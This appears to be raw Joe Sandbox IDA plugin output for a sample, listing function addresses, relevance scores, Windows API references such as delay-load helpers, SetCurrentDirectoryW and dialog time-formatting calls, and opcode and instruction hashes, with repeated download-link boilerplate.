Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 29133a53450020f20cb0030708b44180557f9e0febad137659b137ef21ef41a9
Instruction ID: 327ac234ed2973f1c30f02f94493e6c379666d16262e53e21b4a429757dd77d2
Opcode Fuzzy Hash: 29133a53450020f20cb0030708b44180557f9e0febad137659b137ef21ef41a9
Instruction Fuzzy Hash: 88A0029556D5027C710871516D56D36079CC4C6B51330459BB556940E1954058459531

Function 00B8DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 048dd4f740a5132c3d2c67d61564169b8b43d0d17124f915acf2cd3d291f5611
Instruction ID: 76e24d49be8b0d69a38e802059c46854ebd22c8cf3551c16b5556ab66d206b44
Opcode Fuzzy Hash: 048dd4f740a5132c3d2c67d61564169b8b43d0d17124f915acf2cd3d291f5611
Instruction Fuzzy Hash: A7A0129126C0013C300C7202AC02C3A03DCC0C0B11330419BB106900E5544048049530

Function 00B8DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 89e89e052fb6ac573b9d111604f6421d7beb574701f38fdc3838653435aa704c
Instruction ID: 474ce032720808f0e7573f436901021a80cc0eb47e3c5400d9f41c88b768f79c
Opcode Fuzzy Hash: 89e89e052fb6ac573b9d111604f6421d7beb574701f38fdc3838653435aa704c
Instruction Fuzzy Hash: 8EA0029516D1027C710C72526D56D3A07DCC4C5B51330459BB556940E5555458459531

Function 00B8DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 09b4669ed21b476e315dafd97fe8c2e83b078eaaaca2659eaaf2c8f5c45972b4
Instruction ID: 474ce032720808f0e7573f436901021a80cc0eb47e3c5400d9f41c88b768f79c
Opcode Fuzzy Hash: 09b4669ed21b476e315dafd97fe8c2e83b078eaaaca2659eaaf2c8f5c45972b4
Instruction Fuzzy Hash: 8EA0029516D1027C710C72526D56D3A07DCC4C5B51330459BB556940E5555458459531

Function 00B8DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a1032def03bc0984a1e6cba4a7640551043aee5b03be706ed8319f769f34c58a
Instruction ID: 474ce032720808f0e7573f436901021a80cc0eb47e3c5400d9f41c88b768f79c
Opcode Fuzzy Hash: a1032def03bc0984a1e6cba4a7640551043aee5b03be706ed8319f769f34c58a
Instruction Fuzzy Hash: 8EA0029516D1027C710C72526D56D3A07DCC4C5B51330459BB556940E5555458459531

Function 00B8DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb0d2aa1ccaf2b4e4a5503313a3ea24778786be972a20deb1bea1c4ec465d846
Instruction ID: 474ce032720808f0e7573f436901021a80cc0eb47e3c5400d9f41c88b768f79c
Opcode Fuzzy Hash: eb0d2aa1ccaf2b4e4a5503313a3ea24778786be972a20deb1bea1c4ec465d846
Instruction Fuzzy Hash: 8EA0029516D1027C710C72526D56D3A07DCC4C5B51330459BB556940E5555458459531

Function 00B8DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DAB2

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9d8e5ba9ff0bb162da6e2d4a3d2f7963c046d2fae33f1b2415c4a66e11773de7
Instruction ID: 474ce032720808f0e7573f436901021a80cc0eb47e3c5400d9f41c88b768f79c
Opcode Fuzzy Hash: 9d8e5ba9ff0bb162da6e2d4a3d2f7963c046d2fae33f1b2415c4a66e11773de7
Instruction Fuzzy Hash: 8EA0029516D1027C710C72526D56D3A07DCC4C5B51330459BB556940E5555458459531

Function 00B8DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c1d7fb1d443e2ce9a33b86926d1f9bf5d47403639346b07b3d74358be89e1d7
Instruction ID: 03859a82c6b99ffee95b54728db482643bd7d7e752e89b17d02164809bb3cb0d
Opcode Fuzzy Hash: 2c1d7fb1d443e2ce9a33b86926d1f9bf5d47403639346b07b3d74358be89e1d7
Instruction Fuzzy Hash: 24A011AA2AC002BC300C32002C0BC3A03ECC0C0B20330888BB20B800E2AA808C08A230

Function 00B8DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 58660e43439af6c7a1bc4d69231e71bee1de0ea9f33232f711cb1dc73b16952e
Instruction ID: 03859a82c6b99ffee95b54728db482643bd7d7e752e89b17d02164809bb3cb0d
Opcode Fuzzy Hash: 58660e43439af6c7a1bc4d69231e71bee1de0ea9f33232f711cb1dc73b16952e
Instruction Fuzzy Hash: 24A011AA2AC002BC300C32002C0BC3A03ECC0C0B20330888BB20B800E2AA808C08A230

Function 00B8DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 912d513041a78cb14c8372f6dd383555b289761dbeb4f2c3ede13cd382e7acc8
Instruction ID: 03859a82c6b99ffee95b54728db482643bd7d7e752e89b17d02164809bb3cb0d
Opcode Fuzzy Hash: 912d513041a78cb14c8372f6dd383555b289761dbeb4f2c3ede13cd382e7acc8
Instruction Fuzzy Hash: 24A011AA2AC002BC300C32002C0BC3A03ECC0C0B20330888BB20B800E2AA808C08A230

Function 00B8DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DBD5

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1de86e5170bf658fba31f65a5c73f6a573ee1c3dfb97bc5dd365ab5ea03fbef7
Instruction ID: 03859a82c6b99ffee95b54728db482643bd7d7e752e89b17d02164809bb3cb0d
Opcode Fuzzy Hash: 1de86e5170bf658fba31f65a5c73f6a573ee1c3dfb97bc5dd365ab5ea03fbef7
Instruction Fuzzy Hash: 24A011AA2AC002BC300C32002C0BC3A03ECC0C0B20330888BB20B800E2AA808C08A230

Function 00B8DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DC36

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 68dd416027735bed3c9ddf00a702eaf298ba22b284666ae880e206c54ded82a5
Instruction ID: 3155c81f3d0b55cf2f5d112c84313184cb0e8c2ccddd9631a1a9300d926ca5d1
Opcode Fuzzy Hash: 68dd416027735bed3c9ddf00a702eaf298ba22b284666ae880e206c54ded82a5
Instruction Fuzzy Hash: 7DA0029556D1037C310C75556D56D7603ECC4C5B513304D9FF51A940F165905C45D531

Function 00B8DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B8DC36

Part of subcall function 00B8DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B8DFD6
Part of subcall function 00B8DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B8DFE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b4fa40c103433e807a8b08f4d6442a87b8bc275c85e48703429f14b498b41eb
Instruction ID: 3155c81f3d0b55cf2f5d112c84313184cb0e8c2ccddd9631a1a9300d926ca5d1
Opcode Fuzzy Hash: 2b4fa40c103433e807a8b08f4d6442a87b8bc275c85e48703429f14b498b41eb
Instruction Fuzzy Hash: 7DA0029556D1037C310C75556D56D7603ECC4C5B513304D9FF51A940F165905C45D531

Function 00B79EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00B79104,?,?,-00001964), ref: 00B79EC2

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 2675e0255482cd62438927490af4ff942835534204d3f56647b52160b814e8a0
Instruction ID: cf15744f4712a2ff7b29fb71a4d2786fedb089d2f53e31d1a66db66aaf8dde08
Opcode Fuzzy Hash: 2675e0255482cd62438927490af4ff942835534204d3f56647b52160b814e8a0
Instruction Fuzzy Hash: F7B011300A000A8A8E202B30CC0AA28BAA0EA22B0A30082A0B002CA0A0CF22C002AA00

Function 00B8A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00B8A587,C:\Users\user\Desktop,00000000,00BB946A,00000006), ref: 00B8A326

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 15831a01a53ba46f055b345b69fbde6ec3ed0e69a89a7dc767db71a19feda601
Instruction ID: 8adebcb0f0e531b7c922578752e72063940f60442aaad8e6064be42728b3e086
Opcode Fuzzy Hash: 15831a01a53ba46f055b345b69fbde6ec3ed0e69a89a7dc767db71a19feda601
Instruction Fuzzy Hash: A0A01230194006568A000B30CC0AC1576909761B02F0086207002C10A0CF308814A500

Function 00B796D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00B7968F,?,?,?,?,00BA1FA1,000000FF), ref: 00B796EB

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b98b1da9dd10a60e145c524bb34bedc8a1e12c73b0dd796027f9e9fd89ca6d21
Instruction ID: 8b9c75680aadf52985d8a3aabf18330f622ac29c10a83ef5faa99c11fbe24770
Opcode Fuzzy Hash: b98b1da9dd10a60e145c524bb34bedc8a1e12c73b0dd796027f9e9fd89ca6d21
Instruction Fuzzy Hash: C0F05E31596B048FDB308A24D5497A2B7E59B12725F04DB9E90FB434A09761A84D8B10

Non-executed Functions

Function 00B8B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7130B: GetDlgItem.USER32(00000000,00003021), ref: 00B7134F
Part of subcall function 00B7130B: SetWindowTextW.USER32(00000000,00BA35B4), ref: 00B71365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B8B971
EndDialog.USER32(?,00000006), ref: 00B8B984
GetDlgItem.USER32(?,0000006C), ref: 00B8B9A0
SetFocus.USER32(00000000), ref: 00B8B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00B8B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B8BA18
FindFirstFileW.KERNEL32(?,?), ref: 00B8BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B8BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B8BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B8BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B8BA94
_swprintf.LIBCMT ref: 00B8BAC4

Part of subcall function 00B7400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B7401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B8BAD7
FindClose.KERNEL32(00000000), ref: 00B8BADE
_swprintf.LIBCMT ref: 00B8BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 00B8BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B8BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B8BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B8BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B8BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B8BBC9
_swprintf.LIBCMT ref: 00B8BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B8BC08
_swprintf.LIBCMT ref: 00B8BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00B8BC6F

Part of subcall function 00B8A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B8A662
Part of subcall function 00B8A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BAE600,?,?), ref: 00B8A6B1

Strings

